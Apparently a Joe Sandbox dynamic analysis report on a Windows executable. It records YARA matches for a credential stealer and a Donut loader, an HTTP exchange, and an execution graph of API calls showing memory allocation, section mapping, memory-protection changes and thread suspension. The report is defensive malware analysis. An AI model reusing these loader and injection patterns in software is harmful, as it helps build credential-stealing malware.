                                                                                                                      2024-06-01 15:42:11 UTC12OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
                                                                                                                      Data Ascii: --------
                                                                                                                      2024-06-01 15:42:11 UTC521INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 01 Jun 2024 15:42:11 GMT
                                                                                                                      Content-Length: 0
                                                                                                                      Connection: close
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9nM8ZFdamjNEg%2BAJ0Cbc0DZlAFqrDWpDvS%2Fl1mIhvDsUmOX5i9mq6%2FzebIQpdgHmL20K5Aklgr0Cg1xm3r%2B6o7hF1es9hlcmPzJq2LsqqU7B9N3ZscCD3Hw7ag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 88d04fe9d8732cdf-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:1
                                                                                                                      Start time:11:41:50
                                                                                                                      Start date:01/06/2024
                                                                                                                      Path:C:\Users\user\Desktop\0x001900000002ab40-59.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\0x001900000002ab40-59.exe"
                                                                                                                      Imagebase:0x820000
                                                                                                                      File size:10'445'744 bytes
                                                                                                                      MD5 hash:889CC88BCA04E05C46D9E74636BAEE19
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1722996754.00000000082AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1725697054.00000000082AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:0.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:18.8%
                                                                                                                        Signature Coverage:24.7%
                                                                                                                        Total number of Nodes:308
                                                                                                                        Total number of Limit Nodes:11
                                                                                                                        execution_graph 114193 875590 114194 8755e8 114193->114194 114197 87586d CatchIt 114194->114197 114201 8ffb05 RaiseException EnterCriticalSection LeaveCriticalSection ___std_exception_copy CallUnexpected 114194->114201 114196 8758cb 114203 86d640 183 API calls 2 library calls 114196->114203 114197->114196 114202 900685 5 API calls ___raise_securityfailure 114197->114202 114200 8758e4 114201->114197 114202->114196 114203->114200 114204 8753c0 114205 8753d0 114204->114205 114206 87540c VirtualAlloc 114205->114206 114207 8754a3 114206->114207 114208 8fff36 114209 8fff3f 114208->114209 114216 900456 IsProcessorFeaturePresent 114209->114216 114211 8fff4b 114217 901a82 10 API calls 2 library calls 114211->114217 114213 8fff54 114214 8fff50 114214->114213 114218 901aa1 7 API calls 2 library calls 114214->114218 114216->114211 114217->114214 114218->114213 114219 91e06b GetLastError 114220 91e081 114219->114220 114221 91e087 114219->114221 114248 91e764 6 API calls _unexpected 114220->114248 114225 91e08b ___std_exception_copy 114221->114225 114238 91e7a3 114221->114238 114227 91e110 SetLastError 114225->114227 114229 91e0d1 114232 91e7a3 _unexpected 6 API calls 114229->114232 114230 91e0c0 114231 91e7a3 _unexpected 6 API calls 114230->114231 114231->114225 114233 91e0dd 114232->114233 114234 91e0e1 114233->114234 114235 91e0f8 114233->114235 114236 91e7a3 _unexpected 6 API calls 114234->114236 114249 91e22c EnterCriticalSection LeaveCriticalSection _unexpected 114235->114249 114236->114225 114250 91ec42 114238->114250 114241 91e0a3 114241->114225 114243 8fd200 114241->114243 114242 91e7dd TlsSetValue 114244 8fd20f 114243->114244 114245 8fd233 114244->114245 114258 8e7610 114244->114258 114293 8e6b60 EnterCriticalSection LeaveCriticalSection ___std_exception_copy 114244->114293 114245->114229 114245->114230 114248->114221 114249->114225 114251 91e7bf 114250->114251 114252 91ec72 114250->114252 114251->114241 114251->114242 114252->114251 114257 91eb77 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary ___vcrt_FlsFree 114252->114257 114254 91ec86 114254->114251 114255 91ec8c GetProcAddress 114254->114255 114255->114251 114256 91ec9c _unexpected 114255->114256 114256->114251 114257->114254 114259 8e77ff 114258->114259 114260 8e7634 114258->114260 114312 8e4ff0 106 API calls 114259->114312 114261 8e77e2 114260->114261 114263 8e7644 114260->114263 114261->114259 114261->114261 114294 8e9c60 114261->114294 114263->114259 114267 8e782e TryAcquireSRWLockExclusive 114263->114267 114272 8e7702 114263->114272 114290 8e7ab4 114263->114290 114264 8e7827 114264->114267 114265 8e7b94 ReleaseSRWLockExclusive 114265->114290 114268 8e7857 114267->114268 114269 8e7850 114267->114269 114270 8e7a4f 114268->114270 114271 8e7877 114268->114271 114313 8e6680 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 114269->114313 114299 8f51c0 114270->114299 114275 8e78c0 ReleaseSRWLockExclusive 114271->114275 114271->114290 114272->114267 114276 8e770b 114272->114276 114278 8e7944 TryAcquireSRWLockExclusive 114276->114278 114288 8e772f __fread_nolock 114276->114288 114314 8e6130 78 API calls _ValidateLocalCookies 114276->114314 114282 8e7979 114278->114282 114286 8e7982 114278->114286 114279 8f51c0 76 API calls 114279->114290 114315 8e6680 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 114282->114315 114283 8e7938 114283->114278 114283->114288 114285 8e79eb ReleaseSRWLockExclusive 114286->114285 114286->114290 114288->114270 114289 8e77a8 114288->114289 114311 900685 5 API calls ___raise_securityfailure 114289->114311 114290->114265 114290->114279 114292 8e77cd 114292->114244 114293->114244 114316 8e4990 114294->114316 114298 8e9ca4 114298->114259 114300 8f5283 114299->114300 114301 8f5621 114299->114301 114337 900685 5 API calls ___raise_securityfailure 114300->114337 114301->114300 114303 8f562f 114301->114303 114305 8f563f ReleaseSRWLockExclusive 114303->114305 114307 8f58f2 ReleaseSRWLockExclusive 114303->114307 114304 8f528e 114304->114290 114308 8f569d 114305->114308 114310 8f5d3f 114307->114310 114322 8f5db0 114308->114322 114311->114292 114312->114264 114313->114268 114314->114283 114315->114286 114317 8e49d6 __fread_nolock 114316->114317 114321 900685 5 API calls ___raise_securityfailure 114317->114321 114319 8e4a94 114320 900685 5 API calls ___raise_securityfailure 114319->114320 114320->114298 114321->114319 114323 8f5dc0 114322->114323 114338 8f4920 114323->114338 114325 8f5e87 114325->114307 114326 8f5e46 114326->114325 114341 8f4970 6 API calls 114326->114341 114328 8f5e39 114328->114325 114328->114326 114331 8f5f24 114328->114331 114329 8f4950 70 API calls 114332 8f5dcc 114329->114332 114330 8f5e09 114330->114325 114330->114328 114336 8f4920 57 API calls 114330->114336 114342 8f4950 114330->114342 114334 8f4950 70 API calls 114331->114334 114332->114326 114332->114329 114332->114330 114335 8f4920 57 API calls 114332->114335 114334->114325 114335->114332 114336->114330 114337->114304 114345 8f66f0 114338->114345 114340 8f493a 114340->114332 114341->114325 114445 8f6210 VirtualFree 114342->114445 114344 8f495e 114344->114330 114350 8f6310 114345->114350 114347 8f6709 114347->114340 114388 8f5fb0 VirtualAlloc 114347->114388 114349 8f6797 114349->114340 114351 8f6328 114350->114351 114353 8f632d 114350->114353 114421 8f8780 114351->114421 114354 8f66cf 114353->114354 114358 8f5fb0 30 API calls 114353->114358 114377 8f646c 114353->114377 114380 8f63c0 114353->114380 114384 8f6626 114353->114384 114385 8f6682 114353->114385 114369 8f6310 48 API calls 114354->114369 114355 8f5fb0 30 API calls 114355->114377 114356 8f5fb0 30 API calls 114362 8f638f 114356->114362 114357 8f5fb0 30 API calls 114360 8f6442 114357->114360 114361 8f6386 114358->114361 114359 8f5fb0 30 API calls 114363 8f6435 114359->114363 114364 8f647b GetLastError 114360->114364 114373 8f6489 114360->114373 114374 8f6456 VirtualFree 114360->114374 114361->114362 114367 8f63ce GetLastError 114361->114367 114362->114364 114362->114373 114376 8f63a7 VirtualFree 114362->114376 114363->114360 114372 8f65f1 GetLastError 114363->114372 114364->114373 114365 8f649d GetLastError 114427 931ad0 10 API calls _ValidateLocalCookies 114365->114427 114366 8f65d7 GetLastError 114366->114377 114371 8f6621 114367->114371 114367->114380 114381 8f6709 114369->114381 114428 931ad0 10 API calls _ValidateLocalCookies 114371->114428 114372->114377 114378 8f667d 114372->114378 114373->114347 114374->114354 114374->114377 114375 8f6541 VirtualFree 114375->114354 114375->114377 114376->114354 114376->114380 114377->114354 114377->114355 114377->114364 114377->114365 114377->114366 114377->114373 114377->114375 114377->114381 114382 8f676f VirtualFree 114377->114382 114429 931ad0 10 API calls _ValidateLocalCookies 114378->114429 114380->114359 114380->114377 114380->114381 114380->114382 114380->114385 114381->114347 114387 8f5fb0 30 API calls 114381->114387 114386 8f6797 114382->114386 114384->114354 114384->114356 114384->114377 114384->114380 114384->114381 114384->114382 114384->114385 114385->114354 114385->114357 114385->114377 114385->114381 114385->114382 114386->114347 114387->114386 114389 8f5fff 114388->114389 114390 8f5fd5 114388->114390 114389->114349 114390->114389 114391 8f5fe7 GetLastError 114390->114391 114392 8f5ff8 114391->114392 114393 8f6003 Sleep VirtualAlloc 114391->114393 114392->114389 114392->114393 114393->114389 114394 8f6022 GetLastError 114393->114394 114395 8f603a Sleep VirtualAlloc 114394->114395 114396 8f6033 114394->114396 114395->114389 114397 8f6054 GetLastError 114395->114397 114396->114389 114396->114395 114398 8f606c Sleep VirtualAlloc 114397->114398 114399 8f6065 114397->114399 114398->114389 114400 8f6086 GetLastError 114398->114400 114399->114389 114399->114398 114401 8f6097 114400->114401 114402 8f60a2 Sleep VirtualAlloc 114400->114402 114401->114389 114401->114402 114402->114389 114403 8f60c0 GetLastError 114402->114403 114404 8f60dc Sleep VirtualAlloc 114403->114404 114405 8f60d1 114403->114405 114404->114389 114406 8f60fa GetLastError 114404->114406 114405->114389 114405->114404 114407 8f610b 114406->114407 114408 8f6116 Sleep VirtualAlloc 114406->114408 114407->114389 114407->114408 114408->114389 114409 8f6134 GetLastError 114408->114409 114410 8f6145 114409->114410 114411 8f6150 Sleep VirtualAlloc 114409->114411 114410->114389 114410->114411 114411->114389 114412 8f616e GetLastError 114411->114412 114413 8f617f 114412->114413 114414 8f618a Sleep VirtualAlloc 114412->114414 114413->114389 114413->114414 114414->114389 114415 8f61a8 GetLastError 114414->114415 114416 8f61b9 114415->114416 114417 8f61c4 Sleep VirtualAlloc 114415->114417 114416->114389 114416->114417 114417->114389 114418 8f61e2 GetLastError 114417->114418 114419 8f61fe Sleep 114418->114419 114420 8f61f3 114418->114420 114419->114349 114420->114389 114420->114419 114430 8f8860 TryAcquireSRWLockExclusive 114421->114430 114423 8f8789 114424 8f8795 GetCurrentProcess IsWow64Process 114423->114424 114425 8f87b0 114423->114425 114426 8f87ab 114424->114426 114425->114353 114426->114425 114427->114377 114428->114384 114429->114385 114431 8f8873 114430->114431 114433 8f887d 114430->114433 114444 8e6680 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 114431->114444 114434 8f8890 114433->114434 114437 8f8690 114433->114437 114436 8f88a1 ReleaseSRWLockExclusive 114434->114436 114436->114423 114438 8f87e0 11 API calls 114437->114438 114439 8f86c5 114438->114439 114440 8f87e0 11 API calls 114439->114440 114441 8f86e1 114440->114441 114442 900685 _ValidateLocalCookies 5 API calls 114441->114442 114443 8f86f8 114442->114443 114443->114434 114444->114433 114446 8f6227 114445->114446 114447 8f6233 114445->114447 114446->114344 114448 8f626b 114447->114448 114449 8f6626 114447->114449 114450 8f6272 VirtualFree 114447->114450 114466 8f628d 114447->114466 114453 8f5fb0 30 API calls 114448->114453 114458 8f5fb0 30 API calls 114449->114458 114463 8f63c0 114449->114463 114472 8f6709 114449->114472 114473 8f6682 114449->114473 114474 8f676f VirtualFree 114449->114474 114491 8f66cf 114449->114491 114492 8f646c 114449->114492 114451 8f62af 114450->114451 114452 8f6283 GetLastError 114450->114452 114493 900685 5 API calls ___raise_securityfailure 114451->114493 114452->114451 114452->114466 114455 8f62a8 114453->114455 114454 8f5fb0 30 API calls 114457 8f6386 114454->114457 114455->114451 114459 8f62c0 GetLastError 114455->114459 114461 8f638f 114457->114461 114462 8f63ce GetLastError 114457->114462 114458->114461 114465 8f62cd 114459->114465 114459->114466 114460 8f62b9 114460->114344 114467 8f6489 114461->114467 114468 8f63a7 VirtualFree 114461->114468 114469 8f647b GetLastError 114461->114469 114462->114463 114464 8f6621 114462->114464 114463->114472 114463->114473 114463->114474 114475 8f5fb0 30 API calls 114463->114475 114463->114492 114495 931ad0 10 API calls _ValidateLocalCookies 114464->114495 114465->114451 114465->114466 114466->114454 114467->114344 114468->114463 114468->114491 114469->114467 114472->114344 114479 8f5fb0 30 API calls 114472->114479 114473->114472 114473->114474 114477 8f5fb0 30 API calls 114473->114477 114473->114491 114473->114492 114478 8f6797 114474->114478 114480 8f6435 114475->114480 114476 8f5fb0 30 API calls 114476->114492 114481 8f6442 114477->114481 114478->114344 114479->114478 114480->114481 114482 8f65f1 GetLastError 114480->114482 114481->114467 114481->114469 114488 8f6456 VirtualFree 114481->114488 114486 8f667d 114482->114486 114482->114492 114483 8f6310 57 API calls 114483->114472 114484 8f649d GetLastError 114494 931ad0 10 API calls _ValidateLocalCookies 114484->114494 114485 8f65d7 GetLastError 114485->114492 114496 931ad0 10 API calls _ValidateLocalCookies 114486->114496 114488->114491 114488->114492 114489 8f6541 VirtualFree 114489->114491 114489->114492 114491->114483 114492->114467 114492->114469 114492->114472 114492->114474 114492->114476 114492->114484 114492->114485 114492->114489 114492->114491 114493->114460 114494->114492 114495->114449 114496->114473 114497 59a0357 114498 59a037a 114497->114498 114499 59a03c5 VirtualAlloc 114498->114499 114500 59a03d9 114498->114500 114499->114500 114501 59a03f3 114499->114501 114501->114500 114503 59a04c7 114501->114503 114509 59a1705 114501->114509 114503->114500 114508 59a058b 114503->114508 114531 599f4e7 LoadLibraryA 114503->114531 114505 59a0574 114505->114500 114532 599f5e2 LoadLibraryA 114505->114532 114508->114500 114513 59a0a87 114508->114513 114510 59a171a 114509->114510 114511 59a1790 LoadLibraryA 114510->114511 114512 59a179a 114510->114512 114511->114512 114512->114501 114514 59a0ac2 114513->114514 114515 59a0b09 NtCreateSection 114514->114515 114516 59a0b2e 114514->114516 114529 59a10f9 114514->114529 114515->114516 114515->114529 114517 59a0bc3 NtMapViewOfSection 114516->114517 114516->114529 114526 59a0be3 114517->114526 114518 59a0f0c VirtualAlloc 114524 59a0f4e 114518->114524 114519 59a1705 LoadLibraryA 114519->114526 114520 59a1705 LoadLibraryA 114525 59a0e6a 114520->114525 114521 59a0fff VirtualProtect 114522 59a10ca VirtualProtect 114521->114522 114527 59a101f 114521->114527 114522->114529 114523 59a0f08 114523->114518 114524->114521 114528 59a0fec NtMapViewOfSection 114524->114528 114524->114529 114525->114518 114525->114520 114525->114523 114526->114519 114526->114525 114526->114529 114527->114522 114530 59a10a4 VirtualProtect 114527->114530 114528->114521 114528->114529 114529->114500 114530->114527 114531->114505 114532->114508 114533 594049b 114534 59404a9 114533->114534 114547 5940deb 114534->114547 114536 5940641 GetPEB 114538 59406be 114536->114538 114537 59405fc 114537->114536 114545 594092f 114537->114545 114550 5940bab 114538->114550 114541 594071f CreateThread 114542 59406f7 114541->114542 114561 5940a5b GetPEB 114541->114561 114542->114545 114559 59410ab GetPEB 114542->114559 114544 5940bab 5 API calls 114544->114545 114546 5940779 114546->114544 114546->114545 114548 5940df8 114547->114548 114560 5940e0b GetPEB 114547->114560 114548->114537 114551 5940bc1 CreateToolhelp32Snapshot 114550->114551 114553 59406f1 114551->114553 114554 5940bf8 Thread32First 114551->114554 114553->114541 114553->114542 114555 5940cb4 FindCloseChangeNotification 114554->114555 114556 5940c1f 114554->114556 114555->114553 114556->114555 114557 5940c56 Wow64SuspendThread 114556->114557 114558 5940c80 FindCloseChangeNotification 114556->114558 114557->114558 114558->114556 114559->114546 114560->114548 114564 5940ab4 114561->114564 114562 5940b14 CreateThread 114562->114564 114563 5940b61 114564->114562 114564->114563

                                                                                                                        Executed Functions

                                                                                                                        Function 00873E30 Relevance: 17.4, APIs: 3, Strings: 6, Instructions: 1638librarymemoryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 36 873e30-873e31 37 873e33-873e3a 36->37 38 873e58-873e85 36->38 39 873e3d-873e47 37->39 40 873e3c 37->40 41 873e87-873e89 38->41 42 873e4c-873e52 38->42 39->42 40->39 43 873e8e-873e95 41->43 42->38 44 873e97 43->44 45 873e99-873ebc 43->45 44->45 45->43 46 873ebe-873eca 45->46 47 873ecf-873f03 call 8ffb9c 46->47 50 873f05-875188 call 85b934 call 8fefb9 call 8288b1 call 895ac5 call 8c302b call 8c74a1 call 8fed20 call 852c5f call 8928b4 call 8c986a call 845804 call 9112f0 call 83e0eb call 8284cd call 91294d call 851822 call 840e40 call 8765a7 call 848ae5 call 8aa242 call 906ba9 call 8c43c7 call 88f90b call 8cb6d2 call 8a5fd4 call 8c1de3 call 8ec0c6 call 8f1945 call 8dbd1e call 914a27 call 8d8e76 call 84a69e call 89009f call 82cd0d call 83bc43 call 89aede call 8c3ec6 call 8c890b call 84e403 call 8cf707 call 8716a9 call 8297e9 call 8ca373 call 87a5d6 call 8c2332 call 87caed call 910186 call 8b15eb call 855947 call 87fd58 call 8758d4 call 8d6017 call 829b96 call 9151b9 call 907364 GetModuleHandleA call 878aa3 call 8c9ec6 call 8d146e call 8df71c call 915603 call 84c8be call 87e392 call 8faebc call 843e77 call 8db938 call 892a6e call 8aa10a call 85494e call 863fca call 86c249 call 8fc392 call 8c5d29 call 8d2944 call 8f5956 call 85f309 call 8d2c2b call 840e40 call 8d2944 call 82bd6a call 86ae80 call 8a0335 call 83248b call 8ea597 call 836936 call 856dca call 8a0f31 call 8297e9 call 87032c call 8583b1 call 847390 call 8a6bea call 8c6f03 call 84e403 call 86d1df call 8d7170 call 8f31d8 call 8aae31 call 883112 call 82dbbd call 8df865 call 90a703 call 82bd6a call 8a82fa call 8c0895 call 905add call 869d43 call 8f6fd4 call 9141a2 call 825772 call 8a6980 call 83131a call 85545e call 84c5ef call 8eafbf call 8b5209 call 8232e4 call 8c1582 call 90ad0a call 8e06ca call 8e87e7 call 858ed8 call 8fe6c0 call 869844 call 85494e call 8b2b67 call 9064f8 call 85c7ba call 8c9627 call 84a307 call 861e5c call 8ab577 call 8f0b3a call 90b32b call 8b79cf call 824f89 GetProcAddress call 8224bc call 85ebbc call 8fefb9 call 87710e call 82bd6a call 895ac5 call 8297e9 call 8bb075 call 824f89 call 86ae80 call 90b817 call 8edb56 call 8d746b call 83b70f call 8d5e0b call 8d56f0 call 88d31c call 89786d call 8305a9 call 89aa3b call 85e5d9 call 8297e9 call 903487 call 8d4bb2 call 860345 47->50 371 875190-87558e call 87dfad call 8c8fc9 call 87b47e call 8cae2a call 90bdf7 call 824e69 call 8dc96d call 8570df call 84f40f call 83b70f call 83c4af call 88c6b4 call 89a7a3 call 86dd04 call 868c2d call 82dc82 call 881397 call 8e12d3 call 8305a9 call 8eecc9 call 8cea2d VirtualAlloc call 88a133 call 8c0749 call 8d631e call 8e4655 call 8a27d7 call 8d835a call 8dfe79 call 90c38e call 90e731 call 8b15eb call 87052d call 8c5203 50->371 372 87518b call 911f0c 50->372 372->371
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,0E137A00,4F54B209,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 008744A3
                                                                                                                        • GetProcAddress.KERNEL32(00000001), ref: 00874DE8
                                                                                                                        • VirtualAlloc.KERNEL32(-D602D136,00061E67,-000000015DE352F6,?,?,?,?,43B659F5,?,?,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 0087548D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                        • String ID: MW$<$H$db$ve$`
                                                                                                                        • API String ID: 3695083113-1341802392
                                                                                                                        • Opcode ID: d3ff322d2867a784d82855f612de5753b522fc3a78c9cacbe1949e0473d0c2e6
                                                                                                                        • Instruction ID: 20f7611151aee07b9a699ca295c4861c0db79d9931ccb2cb558be9f20cc372db
                                                                                                                        • Opcode Fuzzy Hash: d3ff322d2867a784d82855f612de5753b522fc3a78c9cacbe1949e0473d0c2e6
                                                                                                                        • Instruction Fuzzy Hash: 5DB26977D793244BA74CEF79AC5A06A3572FBC0340342D22EE80AC7566DF344686B687
                                                                                                                        Function 00873F80 Relevance: 15.5, APIs: 3, Strings: 5, Instructions: 1543librarymemoryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 571 873f80-873fa6 572 873fb1-875188 call 8c302b call 8c74a1 call 8fed20 call 852c5f call 8928b4 call 8c986a call 845804 call 9112f0 call 83e0eb call 8284cd call 91294d call 851822 call 840e40 call 8765a7 call 848ae5 call 8aa242 call 906ba9 call 8c43c7 call 88f90b call 8cb6d2 call 8a5fd4 call 8c1de3 call 8ec0c6 call 8f1945 call 8dbd1e call 914a27 call 8d8e76 call 84a69e call 89009f call 82cd0d call 83bc43 call 89aede call 8c3ec6 call 8c890b call 84e403 call 8cf707 call 8716a9 call 8297e9 call 8ca373 call 87a5d6 call 8c2332 call 87caed call 910186 call 8b15eb call 855947 call 87fd58 call 8758d4 call 8d6017 call 829b96 call 9151b9 call 907364 GetModuleHandleA call 878aa3 call 8c9ec6 call 8d146e call 8df71c call 915603 call 84c8be call 87e392 call 8faebc call 843e77 call 8db938 call 892a6e call 8aa10a call 85494e call 863fca call 86c249 call 8fc392 call 8c5d29 call 8d2944 call 8f5956 call 85f309 call 8d2c2b call 840e40 call 8d2944 call 82bd6a call 86ae80 call 8a0335 call 83248b call 8ea597 call 836936 call 856dca call 8a0f31 call 8297e9 call 87032c call 8583b1 call 847390 call 8a6bea call 8c6f03 call 84e403 call 86d1df call 8d7170 call 8f31d8 call 8aae31 call 883112 call 82dbbd call 8df865 call 90a703 call 82bd6a call 8a82fa call 8c0895 call 905add call 869d43 call 8f6fd4 call 9141a2 call 825772 call 8a6980 call 83131a call 85545e call 84c5ef call 8eafbf call 8b5209 call 8232e4 call 8c1582 call 90ad0a call 8e06ca call 8e87e7 call 858ed8 call 8fe6c0 call 869844 call 85494e call 8b2b67 call 9064f8 call 85c7ba call 8c9627 call 84a307 call 861e5c call 8ab577 call 8f0b3a call 90b32b call 8b79cf call 824f89 GetProcAddress call 8224bc call 85ebbc call 8fefb9 call 87710e call 82bd6a call 895ac5 call 8297e9 call 8bb075 call 824f89 call 86ae80 call 90b817 call 8edb56 call 8d746b call 83b70f call 8d5e0b call 8d56f0 call 88d31c call 89786d call 8305a9 call 89aa3b call 85e5d9 call 8297e9 call 903487 call 8d4bb2 call 860345 571->572 573 873fac call 895ac5 571->573 886 875190-87558e call 87dfad call 8c8fc9 call 87b47e call 8cae2a call 90bdf7 call 824e69 call 8dc96d call 8570df call 84f40f call 83b70f call 83c4af call 88c6b4 call 89a7a3 call 86dd04 call 868c2d call 82dc82 call 881397 call 8e12d3 call 8305a9 call 8eecc9 call 8cea2d VirtualAlloc call 88a133 call 8c0749 call 8d631e call 8e4655 call 8a27d7 call 8d835a call 8dfe79 call 90c38e call 90e731 call 8b15eb call 87052d call 8c5203 572->886 887 87518b call 911f0c 572->887 573->572 887->886
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,0E137A00,4F54B209,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 008744A3
                                                                                                                        • GetProcAddress.KERNEL32(00000001), ref: 00874DE8
                                                                                                                        • VirtualAlloc.KERNEL32(-D602D136,00061E67,-000000015DE352F6,?,?,?,?,43B659F5,?,?,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 0087548D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                        • String ID: <$H$db$ve$`
                                                                                                                        • API String ID: 3695083113-835828700
                                                                                                                        • Opcode ID: d194a00aea2defdc5d5c64f1d0ccc3996ed8cd0b8515859d5e9b41935fba5f37
                                                                                                                        • Instruction ID: 13e39951b2a665df633c909d5b9985978ff9f380b0be8d8728a2975ade783930
                                                                                                                        • Opcode Fuzzy Hash: d194a00aea2defdc5d5c64f1d0ccc3996ed8cd0b8515859d5e9b41935fba5f37
                                                                                                                        • Instruction Fuzzy Hash: 77A25977D783244BA74CEF79AC5A06A3572FBD0340342D22EE80AC7566DF3846867687
                                                                                                                        Function 059A0A87 Relevance: 11.2, APIs: 7, Instructions: 730memorynativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 059A0B20
                                                                                                                        • NtMapViewOfSection.NTDLL(?,00000000), ref: 059A0BC8
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 059A0F3C
                                                                                                                        • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 059A0FF1
                                                                                                                        • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 059A100E
                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 059A10B1
                                                                                                                        • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 059A10E4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
